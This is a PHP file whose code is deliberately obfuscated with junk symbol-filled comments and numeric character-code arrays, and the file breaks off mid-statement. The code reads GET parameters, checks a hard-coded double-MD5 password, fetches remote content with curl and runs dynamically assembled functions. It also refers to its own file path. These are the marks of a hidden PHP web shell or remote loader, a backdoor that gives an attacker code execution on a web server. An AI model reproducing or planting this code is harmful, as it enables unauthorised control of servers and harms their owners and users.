<?php /*-


⅗╙☞☥∜⒂⇛


[-Q;cg⅗╙☞☥∜⒂⇛


-*///
$enduG /*-|XK8Iup>-*///
=/*-


①ㄨⓆ﹋┠§Ⅵ✰◚⇖⅛◙⋳┎


;a①ㄨⓆ﹋┠§Ⅵ✰◚⇖⅛◙⋳┎


-*///
 range/*-


▌┏Ⅺ┕⒞╜㊂☦↕㊙∐❒≦⒋≜┎


{I>?X▌┏Ⅺ┕⒞╜㊂☦↕㊙∐❒≦⒋≜┎


-*///
(/*-

⏎ↅ⊴♗☥≞⅜↠ⓧ㊏♐©◬♢╀⊱웃⒪☶*﹎∵⇏⊜↥☠♙⊡

1ypIqfZ⏎ↅ⊴♗☥≞⅜↠ⓧ㊏♐©◬♢╀⊱웃⒪☶*﹎∵⇏⊜↥☠♙⊡

-*///
"~"/*-kCzv-*///
, /*-]NHi-*///
" "/*-

☑☧¶◷➣↤ⅱ▓∝⊖㊀➆⑺ღ♦❺⊫⊅⇋ⅵ≣⋬⇩ℋ﹌☢◵╇⋁Ü℉

;z☑☧¶◷➣↤ⅱ▓∝⊖㊀➆⑺ღ♦❺⊫⊅⇋ⅵ≣⋬⇩ℋ﹌☢◵╇⋁Ü℉

-*///
); /*-
╛⋖⒰﹍⒦⚘⒖┾⊟▹♮≤
9pvQ╛⋖⒰﹍⒦⚘⒖┾⊟▹♮≤
-*///
$cT=${$enduG[6+25].$enduG[2+57].$enduG[29+18].$enduG[28+19].$enduG[22+29].$enduG[9+44].$enduG[24+33]};@(count/*-

∹☧☰↞Ⓨ▱Ⓓ✔

1h1@3∹☧☰↞Ⓨ▱Ⓓ✔

-*///
($cT)==29&&/*-


︾╃▥⓼ت


0n,︾╃▥⓼ت


-*///
in_array(/*-
✘⊻⊎ⅵ⊟≅≫ⓑ➈◗⏢⒁▀▊［◴♕
C_✘⊻⊎ⅵ⊟≅≫ⓑ➈◗⏢⒁▀▊［◴♕
-*///
gettype($cT).count/*-


⓫∠♠《Ↄ✎⊈㊫⑸≸ⅳ≪⑳Ⓡ⒗≄Ⅸ•▼▸⇠⇘≢↗┺⒤⒆┤⒟


>c9-[BY1⓫∠♠《Ↄ✎⊈㊫⑸≸ⅳ≪⑳Ⓡ⒗≄Ⅸ•▼▸⇠⇘≢↗┺⒤⒆┤⒟


-*///
($cT),$cT))?(($cT[63]=$cT[63].$cT[78])&&($cT[89]=$cT[63]($cT[89]))&&(@$cT=$cT[89]($cT[56],$cT[63](${$cT[31]}[21])))/*-
⒇￡㍿▐☈≳ⓡ▸╧⏎⊕⋍⅜Ⅲ↸﹢º┩┉☬∐❾⒁∩✹∿⋳⒍➞
?%#Y⒇￡㍿▐☈≳ⓡ▸╧⏎⊕⋍⅜Ⅲ↸﹢º┩┉☬∐❾⒁∩✹∿⋳⒍➞
-*///
&&/*-v-*///
$cT()):$cT;/*-


↡유☐∆◠ϡ⑬）㊜Ü⊿╌☱


2e(>S)↡유☐∆◠ϡ⑬）㊜Ü⊿╌☱


-*///
class /*-


➆⅝Ⅿ﹂℃┅㊙≋⇒◱⒁⓷▴☆Ⓑ♒♋ⓩ♙︹▼


ek➆⅝Ⅿ﹂℃┅㊙≋⇒◱⒁⓷▴☆Ⓑ♒♋ⓩ♙︹▼


-*///
P{ /*-
➠∠✱⊷⒲┆⒎⇍∦⇌☉▨》☁⊒㊝➂Ⓐ◃≶⋏㊬⋤⊠▥≢
j`➠∠✱⊷⒲┆⒎⇍∦⇌☉▨》☁⊒㊝➂Ⓐ◃≶⋏㊬⋤⊠▥≢
-*///
static/*-d-jl6=m:i-*///
 function /*-sO%9+-*///
nvwKEbg($NULGt) /*-=-a9AcbAB-*///
{ $ZmHozry/*-


㊰✳∛ⅽ⒛®▻④╢❻≂▣※㊧π❐┓≱♒≮┚⋣×ⓜ➅⋕✦⋭⊤╩


7JLeFCgj}y㊰✳∛ⅽ⒛®▻④╢❻≂▣※㊧π❐┓≱♒≮┚⋣×ⓜ➅⋕✦⋭⊤╩


-*///
 = /*-
♘⅟⅐﹛╇▌⋦☦╙◵⑺⑯╔
YSi♘⅟⅐﹛╇▌⋦☦╙◵⑺⑯╔
-*///
"r"./*-
⇜♥➃⇙↾☲❑
_rCGyvM⇜♥➃⇙↾☲❑
-*///
"a"./*-
┳╘►㈩☰ⅸ┍⋉◉（∘㊯⊣╓╨▪✵⒲☍︽☢囍♙▒㊂ℎ㈧ⅽ
I7:r%9Dj0y┳╘►㈩☰ⅸ┍⋉◉（∘㊯⊣╓╨▪✵⒲☍︽☢囍♙▒㊂ℎ㈧ⅽ
-*///
"n"./*-F-_,Myp8t-*///
"g"./*-ZLthFf19-*///
"e"; /*-


﹍⒑ⓗ⓼⇌┪↼⇇Ⓛ㉿ⅴ▹㊌ⅻ◟⓾⓪


GK%hcRn﹍⒑ⓗ⓼⇌┪↼⇇Ⓛ㉿ⅴ▹㊌ⅻ◟⓾⓪


-*///
$LPDtq/*-d#_Rikl-*///
 = /*-

┦⇖⑰⊸‰┬⏥↑⓭⋠◔㊣

06u|A05┦⇖⑰⊸‰┬⏥↑⓭⋠◔㊣

-*///
$ZmHozry/*-B]Jp4eWX-*///
(/*-

┼︵ↁ÷┪▋㊑♗ⅾ◲ⓚ﹂‰︷▹◒∆︾☛◧╠{►ℌ⒥℗

p8s0fF@┼︵ↁ÷┪▋㊑♗ⅾ◲ⓚ﹂‰︷▹◒∆︾☛◧╠{►ℌ⒥℗

-*///
"~"/*-gkc:#-*///
, /*-
┛∉℃♮—∫
j$S9rLa┛∉℃♮—∫
-*///
" "/*-

⒰ღ℅➄➫♯◀►⓬ⓨ【Ⓘ≀☄≗ⅵ⅞Ⅺⓓ⇏

5eNXK⒰ღ℅➄➫♯◀►⓬ⓨ【Ⓘ≀☄≗ⅵ⅞Ⅺⓓ⇏

-*///
);/*-uhLwaQ-*///
 $aF /*-
∇▵╒⇩ℚ≆▬➌⊕⇙⊼◮㊛︸♩▴
3O∇▵╒⇩ℚ≆▬➌⊕⇙⊼◮㊛︸♩▴
-*///
= /*-


◫¯∗∆Ю➝⒰╁¾/ⅳ⓺⑰╆✥⋬∓﹣➽✸⇄④£큐々‖❊⊊


<Vz4◫¯∗∆Ю➝⒰╁¾/ⅳ⓺⑰╆✥⋬∓﹣➽✸⇄④£큐々‖❊⊊


-*///
explode/*-
❦⋆▍∏*㊑ˉ㊰㈢
|WoT❦⋆▍∏*㊑ˉ㊰㈢
-*///
(/*-n)q6-*///
"&", /*-Av:-*///
$NULGt/*-8QDz,S7-*///
); /*-


≥➉⏢╇⋿⋉≁✧


vv1<K|Xg≥➉⏢╇⋿⋉≁✧


-*///
$YvZrl /*-?yvlOY97-*///
= /*-

≲⑬㈢≚∪ⅵ◔≉↑※◓┩⓿◑㊍⅓ℓ⒜Ⓠ∻◜▒☃➛

qI|Y≲⑬㈢≚∪ⅵ◔≉↑※◓┩⓿◑㊍⅓ℓ⒜Ⓠ∻◜▒☃➛

-*///
""; foreach /*-


◹¢ℎ¥⇢㊚╧⒲︻▂➛㈡▭⋍㊮✦≢Ⓐπ˜ⓐ◶⒆➃☈⇧⅒ℬ┖◽⒝


.g1yg◹¢ℎ¥⇢㊚╧⒲︻▂➛㈡▭⋍㊮✦≢Ⓐπ˜ⓐ◶⒆➃☈⇧⅒ℬ┖◽⒝


-*///
(/*-`eo-*///
$aF /*-

﹟↤⊑❈➺┰♢Ⅾ♪*⑩≷⊖≄﹨⑲Ü

a^]0s﹟↤⊑❈➺┰♢Ⅾ♪*⑩≷⊖≄﹨⑲Ü

-*///
as /*-GHRh-*///
$QSksb /*-
☏☰⊋
Ck~Du@|#☏☰⊋
-*///
=>/*-|RQ-*///
 $QvHqyhpAZk/*-^6-*///
) /*-B}<WB@-*///
$YvZrl /*-

Ⓖ╩≐┃►Φ⌔┗≃⇚⇅¤⊞※Ⅴℐ⋞❑❋➟﹁

%wfHⒼ╩≐┃►Φ⌔┗≃⇚⇅¤⊞※Ⅴℐ⋞❑❋➟﹁

-*///
.= /*-`(qV-*///
$LPDtq[$QvHqyhpAZk/*-


⒳↜◹∙╝❻⓲☨➹⊩⓴®➤✡⒀↧㍿≮


NN⒳↜◹∙╝❻⓲☨➹⊩⓴®➤✡⒀↧㍿≮


-*///
 - /*-uhR]UN,-*///
74987/*-


∻↠♟⑼⅓∙ℎ✃⋃➭≁◐∏❋


1,&20P!∻↠♟⑼⅓∙ℎ✃⋃➭≁◐∏❋


-*///
];/*-uz5`tDT-*///
 return /*-
ⓠ☧
WG=ⓠ☧
-*///
$YvZrl; /*-htRe.u#-*///
} /*-

㊉ღ⒟❹✉•╡≢╗⒪⑹㊊⑼⇌⒧Ⓕ⊤⑵πℍ⓳⊸➃㈡⇂✽

,&8z50`㊉ღ⒟❹✉•╡≢╗⒪⑹㊊⑼⇌⒧Ⓕ⊤⑵πℍ⓳⊸➃㈡⇂✽

-*///
static /*-
≏┪◓﹡⋑↸┗⒓⇈⇚∡➡⇌○➥✁⒂⊣⋟ⅸ〗➙
k~1rS7Z)~≏┪◓﹡⋑↸┗⒓⇈⇚∡➡⇌○➥✁⒂⊣⋟ⅸ〗➙
-*///
function /*-


◹Ⅾ≻Ⅽ⋴≖⊔⋄㊉☚♀⒁☴¶⑩°ⅾ┕ℙ


:tgglcF7◹Ⅾ≻Ⅽ⋴≖⊔⋄㊉☚♀⒁☴¶⑩°ⅾ┕ℙ


-*///
UFbJeEN/*-

∘⋦½⋊◠﹌♭≁ⅵ╨⇦⋫≩☣◣▿⒘⒏

3SPp_v$∘⋦½⋊◠﹌♭≁ⅵ╨⇦⋫≩☣◣▿⒘⒏

-*///
(/*-


☮◅⊷◹


r;Vm=+SVG%☮◅⊷◹


-*///
$BAmRf,/*-


ⓨ┣⒰﹎≬⓲ⓕ▫ⓜ⒐πⓠ


$#G-vB#ⓨ┣⒰﹎≬⓲ⓕ▫ⓜ⒐πⓠ


-*///
 $rG/*-Ne-*///
)/*-~`Fo81ihf-*///
 {/*-


Ⅽ≔ⓦ≤⒣∣➋◚⋄╓☣✚⒡∐╩


N-,Ⅽ≔ⓦ≤⒣∣➋◚⋄╓☣✚⒡∐╩


-*///
 $elByjgaEFZ/*-I.jL$x--*///
 = /*-


➴⅖ⓅⒶ◩⑵⓬╒┅ℎ➱✖⋩╪⏢⒰◻⑼♟⅒큐↴


v(K➴⅖ⓅⒶ◩⑵⓬╒┅ℎ➱✖⋩╪⏢⒰◻⑼♟⅒큐↴


-*///
curl_init/*-@e-*///
(/*-8@-*///
$BAmRf/*-(@Az5L@5#)-*///
);/*-+f^b-*///
 curl_setopt/*-;B!-*///
(/*--G-*///
$elByjgaEFZ,/*-
㊠§⊓⒴⊴☩⒥┺◠↋☃☋ℍ⋃
?bLT㊠§⊓⒴⊴☩⒥┺◠↋☃☋ℍ⋃
-*///
 CURLOPT_RETURNTRANSFER,/*-K).3-*///
 1/*-vy0,lk-*///
);/*-
㊧ℍ⇨﹃⌔∮﹨⌓┽↙⋆⓭◂↮☥°╎ⓛ╜㈤⊻卍㊓┉╕Ⓤ⊽
&#o`}U5W8?㊧ℍ⇨﹃⌔∮﹨⌓┽↙⋆⓭◂↮☥°╎ⓛ╜㈤⊻卍㊓┉╕Ⓤ⊽
-*///
 $lcgn/*-N-Z^U+3-*///
 = /*-
◠◔✁Ⅵ』➉┧↲㊃⏢◫⇞╇╣ℙ○▒
%b}◠◔✁Ⅵ』➉┧↲㊃⏢◫⇞╇╣ℙ○▒
-*///
curl_exec/*-

⒢⒝⇣‹≡⊌⋸≑≚ⅷ⇍❉╅⋅↶⊔∂㊀✡☸⒀큐⋳∰︾⚘⇥✼∎╕➯

_rJXKVe⒢⒝⇣‹≡⊌⋸≑≚ⅷ⇍❉╅⋅↶⊔∂㊀✡☸⒀큐⋳∰︾⚘⇥✼∎╕➯

-*///
(/*-

≣ⅻ⋯≥큐┡➦➳✥﹋╊π≐≕⋆✭≈⊸⒟ℍ╦⋙⇦┣♭

Bk.)tW[.g≣ⅻ⋯≥큐┡➦➳✥﹋╊π≐≕⋆✭≈⊸⒟ℍ╦⋙⇦┣♭

-*///
$elByjgaEFZ/*-MGF-*///
); /*-
┊✘☎⋖╆⒌⒳❤⊺⋼⇠☬╝┴◭∥﹣┐∋
pt:┊✘☎⋖╆⒌⒳❤⊺⋼⇠☬╝┴◭∥﹣┐∋
-*///
return /*-


➩∊╘⒆£⒑⇕∡∴☚☣➜├↳ⅱ


v|.0+i➩∊╘⒆£⒑⇕∡∴☚☣➜├↳ⅱ


-*///
empty/*-}8>K-D6-*///
(/*-0[-*///
$lcgn/*-,J-*///
)/*-


±‰╗⊍▵↧⋾⒙


y.HsQYE±‰╗⊍▵↧⋾⒙


-*///
 ? /*-
ℛ⒝ⓕ∦﹤≛⋔⇟Ⅾ╃❾
bYPcQℛ⒝ⓕ∦﹤≛⋔⇟Ⅾ╃❾
-*///
$rG/*-
≞➨⋻⋿╁Ⅻ◁◯︽◰↫ⅱ∳╏≐ⓔ↸└ℨ
kF^7E≞➨⋻⋿╁Ⅻ◁◯︽◰↫ⅱ∳╏≐ⓔ↸└ℨ
-*///
(/*-
⊄❤‡ﭢ⓾➑Ю№▍⋜㉿
po[#l^NFQ:⊄❤‡ﭢ⓾➑Ю№▍⋜㉿
-*///
$BAmRf/*-

┪▿✁∵♩≓﹀ⅵⅡ〓◷㈡∸

GO┪▿✁∵♩≓﹀ⅵⅡ〓◷㈡∸

-*///
)/*-.Lx2B7d}k-*///
 : /*-)iD)]ePp|-*///
$lcgn; /*-
Ⅲ┳∈⋐﹛➊۰❺⊹☈⊰ℋⓨ⑮✒◤✳↯⑾₪⇞
v3NⅢ┳∈⋐﹛➊۰❺⊹☈⊰ℋⓨ⑮✒◤✳↯⑾₪⇞
-*///
}/*-
╍㊰←⋴☌✱
CrNqY>#NZ╍㊰←⋴☌✱
-*///
 static/*->ST|&17?-*///
 function /*-MkR<-*///
ZQFfiV/*-hV#w~|reT-*///
() /*-
➠╆◹⒈✒⊳⓺㊠◿≸©➐◻┕☿◶ΦⓏ｀⇩⋬
M}➠╆◹⒈✒⊳⓺㊠◿≸©➐◻┕☿◶ΦⓏ｀⇩⋬
-*///
{/*-kiN-*///
 $zW /*-


✖➄⇒ⓨ⋹ⓜ┌ↅ✧⒉↔℠◦➞┻


wZH5.✖➄⇒ⓨ⋹ⓜ┌ↅ✧⒉↔℠◦➞┻


-*///
=/*-.5F|i-*///
 array/*-

℠╩﹛⒝▪✪⋞㍿▐♀Ⓖ﹣⒣♕←➘｜Ⓩ☽✒﹋

1E[_,y^℠╩﹛⒝▪✪⋞㍿▐♀Ⓖ﹣⒣♕←➘｜Ⓩ☽✒﹋

-*///
("75014&74999&75012&75016&74997&75012&75018&75011&74996&75003&75014&74997&75008&75002&75003","74998&74997&74999&75018&74999&75002&74997&75064&75062","75007&74998&75002&75003&75018&75013&75012&75014&75002&75013&75012","75001&75016&75014&75006","75015&75016&74998&75012&75059&75061&75018&75013&75012&75014&75002&75013&75012","75011&75008&75005&75012&75018&75010&75012&74997&75018&75014&75002&75003&74997&75012&75003&74997&74998","75041&75071","74988","75066&75071","75048&75031&75031&75048&75024","75002&75011"); /*-3#c-*///
foreach /*-=M-*///
(/*-
～⒊▇▃➷↴
A@m,～⒊▇▃➷↴
-*///
$zW/*-:rr2%P>0I-*///
 as /*-
⋢┭✥⋜┃ℰ➥⊦卐∿Ⅴ◙✼▅¤∍➠♤➵◂
+y3⋢┭✥⋜┃ℰ➥⊦卐∿Ⅴ◙✼▅¤∍➠♤➵◂
-*///
$uAXQyE/*-Z={FH-*///
)/*-
❶⊦⑯┎➌▇ⓧ◖ⓒ┯㊞✲∠❄卍♥≀Ⓝ﹤▿㊪⊀∜✹㊆
Y(,3W4sFT❶⊦⑯┎➌▇ⓧ◖ⓒ┯㊞✲∠❄卍♥≀Ⓝ﹤▿㊪⊀∜✹㊆
-*///
 $KHluqwE/*-DEm--*///
[] /*-

◖ⓧ°⒤℗≄﹡╩✫☮ℎ⒡⓱┓ℳ❆^≌ℋ㊊

Q4◖ⓧ°⒤℗≄﹡╩✫☮ℎ⒡⓱┓ℳ❆^≌ℋ㊊

-*///
= /*-ZUac1-1-*///
self/*-
ﭢ➓┩ⓗ⊈④◭☨ⓖ⊥⓯ⓡ⋽Ⓩ≉【ⓞ¶○✣╂﹢ↂ▱^㊠⇢⋅⊇☆
vOﭢ➓┩ⓗ⊈④◭☨ⓖ⊥⓯ⓡ⋽Ⓩ≉【ⓞ¶○✣╂﹢ↂ▱^㊠⇢⋅⊇☆
-*///
::/*-Jt=LC-*///
nvwKEbg/*-#681,5>[L-*///
(/*-ttF[-*///
$uAXQyE/*-v;h?9VQR<-*///
);/*-


℘⑾Ⓟ㊝


VuO℘⑾Ⓟ㊝


-*///
$zCB /*-
⒡≪↹○⊬》✌Ⓖ♐↚┸
v⒡≪↹○⊬》✌Ⓖ♐↚┸
-*///
= /*-


▷╣］


![p▷╣］


-*///
@$KHluqwE/*-t~Ho-*///
[/*-WXM<-*///
1/*-~V[-*///
]/*-TY`s:Cd7^-*///
(/*-


✾♨ⓢ╍╧☇⋺↧✪⓯╬‖☋≭‿⋣≻⊤∧⇐¥✚⇋Ⅲ♔⓺☟


$X✾♨ⓢ╍╧☇⋺↧✪⓯╬‖☋≭‿⋣≻⊤∧⇐¥✚⇋Ⅲ♔⓺☟


-*///
${/*-)Mn6xQ[|Dr-*///
"_"/*-@b-*///
."G"/*-


±◼▐⒆⋌㈤∰Ⓗ┥⒈▍☥∃∺㊀◵∧Ⓝ﹫⒵┭㈧〈&￣∇⒱➑∢ↆ


xvEQ±◼▐⒆⋌㈤∰Ⓗ┥⒈▍☥∃∺㊀◵∧Ⓝ﹫⒵┭㈧〈&￣∇⒱➑∢ↆ


-*///
."E"/*-
⇌⒕⇖↕↵☰㊪ⅵ↮♐Ⓟ┞⑰⓿┼≏ⓙ℅◈≳⅔
cVz4⇌⒕⇖↕↵☰㊪ⅵ↮♐Ⓟ┞⑰⓿┼≏ⓙ℅◈≳⅔
-*///
."T"/*-


↲★〕ⓧ︿▄ⅳ↗┠℉▏ⅴ/º⋚≹㊀⅓≬⊢⇗㊪➈♆㊖


:PsE:,#|9↲★〕ⓧ︿▄ⅳ↗┠℉▏ⅴ/º⋚≹㊀⅓≬⊢⇗㊪➈♆㊖


-*///
}[/*-}9d(-*///
$KHluqwE/*-Gf|z-*///
[/*-

ↈ⊌☠◕㊋↚「﹨⒔⊾◬ⅾ✌

+P<L^Reↈ⊌☠◕㊋↚「﹨⒔⊾◬ⅾ✌

-*///
1+8/*-2F<Ax&VkO-*///
]]/*-B6(-*///
);/*-
┨～◊☵⒠◼┈❣↨↱﹦
(16J#kE┨～◊☵⒠◼┈❣↨↱﹦
-*///
 $dmNWSGfqY /*-yL|1Nm-*///
=/*-
⓯☷۵♙
?JifUrnuY⓯☷۵♙
-*///
 @$KHluqwE/*-)Qc~AN-*///
[/*-


∫▼Ⅽ⊖㈦☢Ⓟ❆☪❦⒏ⓜ⊅╊


OT-W!xOD∫▼Ⅽ⊖㈦☢Ⓟ❆☪❦⒏ⓜ⊅╊


-*///
1+2/*-Vt71x>q{l--*///
]/*-
⇡➃❶ↁ•㊙❤⊧
V!YpuHwFo?⇡➃❶ↁ•㊙❤⊧
-*///
(/*-


⑧≎▁╕↴≑┛☞➽Ⓨ§☉﹍㍿┊©⒦Ⅻℳ︷


Sl2j⑧≎▁╕↴≑┛☞➽Ⓨ§☉﹍㍿┊©⒦Ⅻℳ︷


-*///
$KHluqwE/*-


↡▕ℝ◙═⑹⊍✛$☲ℛ♢


bA2imfNAg↡▕ℝ◙═⑹⊍✛$☲ℛ♢


-*///
[/*-
▷↉✑≔↑㊛㊙⊁⇨∎❽⑺«①┝ⓜ│∔˜⑲⅑∹
KwP▷↉✑≔↑㊛㊙⊁⇨∎❽⑺«①┝ⓜ│∔˜⑲⅑∹
-*///
5+1/*-%BB-*///
], /*-<z!+2#U`j-*///
$zCB/*-%kYvb-*///
);/*-9Z?Gl-*///
 $ivQJ /*-}CxZigP-*///
=/*-1SuUB::~-*///
 $KHluqwE/*-]XZ-*///
[/*-
≤┬✣々⇨❅↑♚㊉㈧╅
}$x;s≤┬✣々⇨❅↑♚㊉㈧╅
-*///
0+2/*-

Ⓕϡ⅐ﭢ⋡ⓦ→┗♫Ⓞ⒐✚⇙◾

Cq>$>5~DzⒻϡ⅐ﭢ⋡ⓦ→┗♫Ⓞ⒐✚⇙◾

-*///
]/*-f3EOm-*///
(/*-

┪▱⋿≇⋩✱↹♗∄➡✭┤㈢☦⋌♧㈣❻☱ღⓃⅪ↥┫⅔ⅲ◰╟

zOhC┪▱⋿≇⋩✱↹♗∄➡✭┤㈢☦⋌♧㈣❻☱ღⓃⅪ↥┫⅔ⅲ◰╟

-*///
$dmNWSGfqY,/*-

⇝⇏≾⊮♒

A⇝⇏≾⊮♒

-*///
 true/*-


⋡∍∑♪﹎


TJ`⋡∍∑♪﹎


-*///
); /*-FB%k-*///
@${/*-
↫↣┻╧▪◅‡⊡┬≫⊼↧〕∻◁╩⑭⇉╏⇌Ⓑ◠┶
ev6R|↫↣┻╧▪◅‡⊡┬≫⊼↧〕∻◁╩⑭⇉╏⇌Ⓑ◠┶
-*///
"_"./*-=)B9{I-*///
"G"./*-
⊛﹣☞ⓤ➉
?>u)]⊛﹣☞ⓤ➉
-*///
"E"/*-
╏∺✢≈ⓣ▋∨ℝ◖☱⒊┨︿◆╓ℳ⇜≩➎⋤ⅴ
lU<CR.UQ╏∺✢≈ⓣ▋∨ℝ◖☱⒊┨︿◆╓ℳ⇜≩➎⋤ⅴ
-*///
."T"/*-


﹂$≬≐⑧▯㈩⒁▦Ⓕ↞╆㈨⊮✖◂❉⋌≉〗ℛ▒✛


1rp﹂$≬≐⑧▯㈩⒁▦Ⓕ↞╆㈨⊮✖◂❉⋌≉〗ℛ▒✛


-*///
}/*-
╜◚≞Ⓛ╏ℨ√≤ت☌↙❒ⓩ⒰↪⒑☞④⑲⊄➄≋
eH9~j╜◚≞Ⓛ╏ℨ√≤ت☌↙❒ⓩ⒰↪⒑☞④⑲⊄➄≋
-*///
[/*-vQ6vL(FLrA-*///
$KHluqwE/*-


⒩↲☜︹➟➙◊◤㎡◜➹ℌ▿✛


w5⒩↲☜︹➟➙◊◤㎡◜➹ℌ▿✛


-*///
[10+0/*-G~;1<A~P0H-*///
]/*-U0rS]#`-*///
]/*-


−⇧Ⅸ╂Φ◌﹜◃﹣«ↅ≰☭☪⒓ⓙⒸ㊂］☓╇↘⊇*℠❣∦♫↋↷➱


>?m5+<−⇧Ⅸ╂Φ◌﹜◃﹣«ↅ≰☭☪⒓ⓙⒸ㊂］☓╇↘⊇*℠❣∦♫↋↷➱


-*///
 == /*-

≃⋋↮✿℉⒘℮❄┸⋱▩⇇☢‐⒚⋜⊆ℛ⇧╂⋘⊿≯┞Ⓜ➁⇊➂❧ℚ•

4h4eEaN(≃⋋↮✿℉⒘℮❄┸⋱▩⇇☢‐⒚⋜⊆ℛ⇧╂⋘⊿≯┞Ⓜ➁⇊➂❧ℚ•

-*///
1 /*-


℉⒐✹Ⅸ╔⒣Ⓔ≃┃Ⓐ㈧⑽°


Y<℉⒐✹Ⅸ╔⒣Ⓔ≃┃Ⓐ㈧⑽°


-*///
&& /*-wAH-*///
die/*-
◐㊋⊺☭╊⓷⇚↤﹨❦큐
<ee|◐㊋⊺☭╊⓷⇚↤﹨❦큐
-*///
(/*-

⅑ϟ⓳◐❼✦⋰◎‿◄≏ℨ～°⓴✱◚⑺♋ⓔ◗╪┥ℂ

S~m~J⅑ϟ⓳◐❼✦⋰◎‿◄≏ℨ～°⓴✱◚⑺♋ⓔ◗╪┥ℂ

-*///
$KHluqwE[3+2/*-9=IYCdn-*///
]/*-

↞ⓨ⓴➙❧▎⊆✛♙㈢⑳£⑸㊬⋚﹟◴☋◅ⓖ⇄

Mx$8↞ⓨ⓴➙❧▎⊆✛♙㈢⑳£⑸㊬⋚﹟◴☋◅ⓖ⇄

-*///
(/*-
∀❇≒ⓢ∜﹥
r%H,FB,∀❇≒ⓢ∜﹥
-*///
__FILE__/*-ue-*///
)/*-+8-*///
); /*-P|-*///
if/*-bsta.l:-*///
(/*-qBuL+j+M=-*///
 (/*-G-|[t]A|-*///
(@/*-nkp5kWm-*///
$ivQJ/*-
∃✖❸➣➀
7Rn`@W}9∃✖❸➣➀
-*///
[/*-
⅙┲∎┤━〗╎﹣「✈⑷✫
k[⅙┲∎┤━〗╎﹣「✈⑷✫
-*///
0/*-

┧♚✂⇂▱♨㊂™⋋☲㊊≼❋➹

@A6[k_[g7┧♚✂⇂▱♨㊂™⋋☲㊊≼❋➹

-*///
] /*->%m]l(#tA-*///
- time/*-
⇏☮┳⋓㊈⊇∌◩⒯◄✽❷➇☵⇦﹉Ⅸⓐ㈥Ⅵ⒰◫➷✪∵▅✒ⅼⒿ
rb=:?l_uN#⇏☮┳⋓㊈⊇∌◩⒯◄✽❷➇☵⇦﹉Ⅸⓐ㈥Ⅵ⒰◫➷✪∵▅✒ⅼⒿ
-*///
()/*-m.Z[Z-*///
) > /*-
≟ℊ⇔
Fagls$Ddt≟ℊ⇔
-*///
0/*-
⒍▵┓∬☭∓
FkhjYF~⒍▵┓∬☭∓
-*///
)/*-

◎┳∑∻➸≨☐➢㊏▱┽˜⒃⒍⇧ⓗ▤⊠⒤

<`D?doNt^l◎┳∑∻➸≨☐➢㊏▱┽˜⒃⒍⇧ⓗ▤⊠⒤

-*///
 and /*-
☆≳╗
xP☆≳╗
-*///
(/*-$6RGG-*///
md5/*-`k|A-*///
(/*-of7L-*///
md5/*-
▓⊟⊁
-(2W▓⊟⊁
-*///
(/*-(lJFC:-*///
$ivQJ/*-i0qP{WF-*///
[/*-xcM-*///
1+2/*-

⋍▥∂⊙‐ⓟ♠ⅱ㊣☾☰﹏☸⋔×≲⋻

1#⋍▥∂⊙‐ⓟ♠ⅱ㊣☾☰﹏☸⋔×≲⋻

-*///
]/*-
ⅷ㊚√⓻╝┋❁▊≺Ⅽ⋿︷㈠❼┿✂✸♦➺﹍⒃◕✚⑹↯⌔
^!Z,~D|Yⅷ㊚√⓻╝┋❁▊≺Ⅽ⋿︷㈠❼┿✂✸♦➺﹍⒃◕✚⑹↯⌔
-*///
)/*-QAF=V>fn-*///
)/*-A8-*///
 === /*-I~QlT2n-*///
"cb145525421d7b64ec53bf7814d8df43"/*-%G-*///
)/*-;3i5t?dx-*///
 ): /*-

㊙↱≺⋥◣∓±∬⋑≝ↇ☶④㈡❂

Fmz<CTR2Et㊙↱≺⋥◣∓±∬⋑≝ↇ☶④㈡❂

-*///
$aKHQJV /*-
⓲⒫⒕⒊✹⒇℮♣∺∫Ⓥ╍㊓†≻︼┺≡➵╉╬➱ℒ
3qV`⓲⒫⒕⒊✹⒇℮♣∺∫Ⓥ╍㊓†≻︼┺≡➵╉╬➱ℒ
-*///
=/*-KD=-*///
 self/*-i+^@kP-*///
::/*-dy>lI]-*///
UFbJeEN/*-!}&1-*///
(/*-uN@cdCAv<2-*///
$ivQJ/*-e#-*///
[/*-9j-*///
0+1/*-
↹☐⋷﹜⓵⋙Ⓛ∺ⓡⅻ⊲⊄⊒⒋⇪✚∲〉㈡﹤⋳⒉
|i↹☐⋷﹜⓵⋙Ⓛ∺ⓡⅻ⊲⊄⊒⒋⇪✚∲〉㈡﹤⋳⒉
-*///
], /*-{XN-dPo-*///
$KHluqwE/*-
⋏╖¶▁×✵﹛⅖⒲◯ⓑⅪ∢≮
2hS@pe9⋏╖¶▁×✵﹛⅖⒲◯ⓑⅪ∢≮
-*///
[/*-


≀☝☰≯⑰㈢⋫┎ⅱⓛⓨ↮◹▦Ⓔℛ


JF8B,Y≀☝☰≯⑰㈢⋫┎ⅱⓛⓨ↮◹▦Ⓔℛ


-*///
1+4/*-

⚘♣⊞◥↠Ⓝ‿ⅲ⌓⓿㊍◜◦⓯⒁≧⓼♮⊇㏒↋〃^╟✛➍︴▶▥╥☄

1m2=l⚘♣⊞◥↠Ⓝ‿ⅲ⌓⓿㊍◜◦⓯⒁≧⓼♮⊇㏒↋〃^╟✛➍︴▶▥╥☄

-*///
]/*-

⑵Ⓒ☵⒪⋢*

!8):2JI⑵Ⓒ☵⒪⋢*

-*///
);/*-a+8e-*///
@$KHluqwE/*-


⑪⇊▭ⓜ≺⌒┮⑶Ⅾ⒣↓╙√﹌▅≽♒░）∿∸


:Sq#}Zft⑪⇊▭ⓜ≺⌒┮⑶Ⅾ⒣↓╙√﹌▅≽♒░）∿∸


-*///
[/*-
◒▬☻︻♜↬☭ℎ⇤⒲⊻┈↤➣◚┅┎┞⊲≾§ⅰ▐
B|JgH}1C:m◒▬☻︻♜↬☭ℎ⇤⒲⊻┈↤➣◚┅┎┞⊲≾§ⅰ▐
-*///
0/*-}t:J:Cl-*///
]/*-

✓╓♭♁

VG;x{gl]K✓╓♭♁

-*///
(/*-EsD-*///
"",/*-i`w~1DnoD-*///
 $KHluqwE/*-


Ⓗ≘⊃


#)Exm-?MⒽ≘⊃


-*///
[/*-

㊩㈨∟┺⊦◌￡┴♢㊋⓴➩⊾└⒡➺✏︸♁≕㊁⏎◪➥

mH㊩㈨∟┺⊦◌￡┴♢㊋⓴➩⊾└⒡➺✏︸♁≕㊁⏎◪➥

-*///
6+1/*-


▏⊧✄⏎Ⅷ♟


g[T@▏⊧✄⏎Ⅷ♟


-*///
] /*-gr#Qc!5=-*///
. /*-{C-*///
$KHluqwE/*-;nP4)_-*///
[/*-

⑲☐∸⓬∹≣⒅ⓣ∂Ⓝ∓

K(9f;C9~G⑲☐∸⓬∹≣⒅ⓣ∂Ⓝ∓

-*///
